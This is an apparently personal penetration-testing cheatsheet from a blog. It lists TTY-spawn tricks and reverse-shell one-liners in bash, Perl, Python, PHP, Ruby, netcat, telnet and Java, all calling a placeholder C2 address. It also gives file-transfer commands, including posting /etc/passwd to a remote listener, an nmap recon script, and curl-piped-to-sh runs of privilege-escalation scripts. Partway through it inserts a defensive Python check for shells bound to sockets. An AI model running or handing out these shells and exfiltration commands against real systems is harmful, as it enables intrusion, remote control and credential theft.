N4pst3r

To see the world, things dangerous to come to, to see behind walls, draw closer, to find each other and to feel. That is the purpose of life.

– Life Magazine

Cheatsheet

A simple cheatsheet that is useful for me.

Spawn TTY

Spawn a teletypewriter (TTY), i.e. an interactive shell

Python

python -c 'import pty;pty.spawn("/bin/bash")'
Or
python3 -c 'import pty;pty.spawn("/bin/bash")'

Python (from within an interactive Python prompt)

import os; os.system('/bin/bash')

sh

/bin/sh -i

Bash

/bin/bash -i

Perl

perl -e 'exec "/bin/sh";'

From within vi

:!bash
Or
:set shell=/bin/bash
Then
:shell

Nmap

nmap --interactive   # only in old Nmap releases that still ship interactive mode
Then
!sh

Lua

os.execute('/bin/sh')

From within IRB

exec "/bin/sh"

Ruby

ruby -e 'exec "/bin/sh"'


Reverse Shell

The target machine initiates the connection to the C&C (aka C2, Command & Control) server, which listens for incoming connections on a specified port.
Key: $c2ip = IP address of the C&C machine
$c2port = port on which the C&C machine is listening

Bash

bash -i >& /dev/tcp/$c2ip/$c2port 0>&1
or
0<&196;exec 196<>/dev/tcp/$c2ip/$c2port; sh <&196 >&196 2>&196

Perl

perl -e 'use Socket;$i="$c2ip";$p=$c2port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
or
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"$c2ip:$c2port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Perl on Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"$c2ip:$c2port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$c2ip",$c2port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("$c2ip",$c2port);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("$c2ip",$c2port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Or Ruby that doesn't depend on /bin/sh
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("$c2ip","$c2port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Or Ruby on Windows
ruby -rsocket -e 'c=TCPSocket.new("$c2ip","$c2port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

nc -e /bin/sh $c2ip $c2port
Or
nc -c /bin/sh $c2ip $c2port
Or
/bin/sh | nc $c2ip $c2port
Or
rm -f /tmp/p; mknod /tmp/p p && nc $c2ip $c2port 0</tmp/p | /bin/sh 1>/tmp/p
Or, if your Netcat build lacks -e/-c:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc $c2ip $c2port >/tmp/f

Java (the `as String[]` cast is Groovy syntax; in plain Java pass a String[] directly)

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/$c2ip/$c2port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet ?!? lolwut ?!?

rm -f /tmp/p; mknod /tmp/p p && telnet $c2ip $c2port 0</tmp/p | /bin/sh 1>/tmp/p
Or
telnet $c2ip $c2port | /bin/bash | telnet $c2ip $c2port2   # needs two listeners on the C&C machine: one on $c2port (sends commands) and one on $c2port2 (receives output)
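From the defender's side, the Python, Perl and PHP one-liners above all end the same way: a shell whose file descriptors 0, 1 and 2 are the same TCP socket. The following is an added example, not part of the original cheatsheet, that checks Linux /proc for exactly that pattern; the process sample is constructed, and the SHELLS name list is an assumption you would tune per host.

```python
import os
import re

# The dup2()/fdopen() one-liners above leave a process whose fds 0, 1 and 2 all
# point at the same TCP socket; that is the pattern this check looks for.
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")
# Shells/interpreters worth flagging (assumed list). inetd-style daemons also run
# with socket std fds, so the name filter keeps them out of the hit list.
SHELLS = {"sh", "bash", "dash", "zsh", "perl", "python", "python3", "php", "ruby"}

def is_socket_shell(comm, fds):
    """fds maps 0/1/2 to the readlink() target of /proc/<pid>/fd/<n>."""
    inodes = set()
    for fd in (0, 1, 2):
        m = SOCKET_RE.match(fds.get(fd, ""))
        if not m:
            return False  # a pty, pipe or file on any std fd: not this pattern
        inodes.add(m.group(1))
    return len(inodes) == 1 and comm in SHELLS

def find_socket_shells(procs):
    """procs: {pid: {"comm": name, "fds": {0: target, 1: target, 2: target}}}"""
    return sorted(pid for pid, p in procs.items() if is_socket_shell(p["comm"], p["fds"]))

def snapshot_proc():
    """Build the same structure from a live Linux /proc (root is needed to read
    other users' fd links); processes that vanish mid-read are skipped."""
    procs = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as f:
                comm = f.read().strip()
            fds = {fd: os.readlink(f"/proc/{entry}/fd/{fd}") for fd in (0, 1, 2)}
        except OSError:
            continue
        procs[int(entry)] = {"comm": comm, "fds": fds}
    return procs

# Constructed sample, not captured from a real host: 1234 is the dup2() shell,
# 1235 an interactive terminal, 1236 a daemon, 1237 the pipe-based nc variant.
SAMPLE = {
    1234: {"comm": "sh", "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    1235: {"comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    1236: {"comm": "sshd", "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}},
    1237: {"comm": "nc", "fds": {0: "pipe:[777]", 1: "socket:[48214]", 2: "/dev/pts/1"}},
}
```

`find_socket_shells(snapshot_proc())` runs the same check against a live host. The fifo/pipe variants above (cat /tmp/f | /bin/sh | nc) and the Java loop leave the shell's std fds on pipes rather than the socket, so they need a separate rule (for example, a shell whose parent or pipe peer is nc/telnet holding the socket).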


File Transfers

Linux

Host files
python -m SimpleHTTPServer 80
Or
python3 -m http.server 80
Or
python -m pyftpdlib -p 21 # FTP
Grab files
wget http://<ip>:<port>/stuff.txt
Receive files
nc -nvlp <port> > file # redirect the incoming data into a new file
Send files
NC
nc <ip> <port> < file
wget
wget --post-file=/etc/passwd <ip>:<port>
tail -n +10 file > clean_file # strip the HTTP request headers that the listener captured in front of the data (adjust the line count to match)

Windows

Grab files - HTTP
C:\Users\<user>>certutil -urlcache -split -f http://<ip>:<port>/secrets.txt secrets.txt
Grab files - FTP
C:\Users\<user>>ftp <ip>
ftp> get <file>



Cyber Kill Chain

Reconnaissance Phase

reconnaissance.sh
#!/bin/bash
# Usage: ./reconnaissance.sh <target> [extra nmap options...]
target=$1; shift   # everything after the target is passed straight to the second nmap run
echo "Obtaining ports..."
# Fast full-range scan; keep only the port number from lines like "22/tcp open ssh"
ports=$(nmap -p- --min-rate 1000 -T4 "$target" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
if [ -z "$ports" ]; then
    echo "No open ports found on $target"
    exit 1
fi
echo "Ports obtained: $ports"
echo "Scanning..."
# Script and version scan limited to the ports found above
nmap -sC -sV -Pn -p "$ports" "$target" "$@"
Example
./reconnaissance.sh 192.168.1.1 -oX nmap.xml


Linux Privilege Escalation

LinEnum

Linux Enumeration

Usage
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

LinPEAS.sh

Linux Privilege Escalation Awesome Script

Usage
curl -L https://n4pst3r.me/linpeas.sh | sh


Windows Privilege Escalation

WinPEAS

Windows Privilege Escalation Awesome Script

Usage

Download the GitHub repo (winPEAS lives in the winPEAS directory of PEASS-ng):

git clone https://github.com/carlospolop/PEASS-ng

Follow the instructions there to build your own executable, or use the prebuilt ones (x64/x86).

Then download winPEAS to the system you want to test and run it as winpeas.exe



Contacts
Social Link
Twitter @LudovicoLoreti
Linkedin @LudovicoLoreti
Github @LudovicoLoreti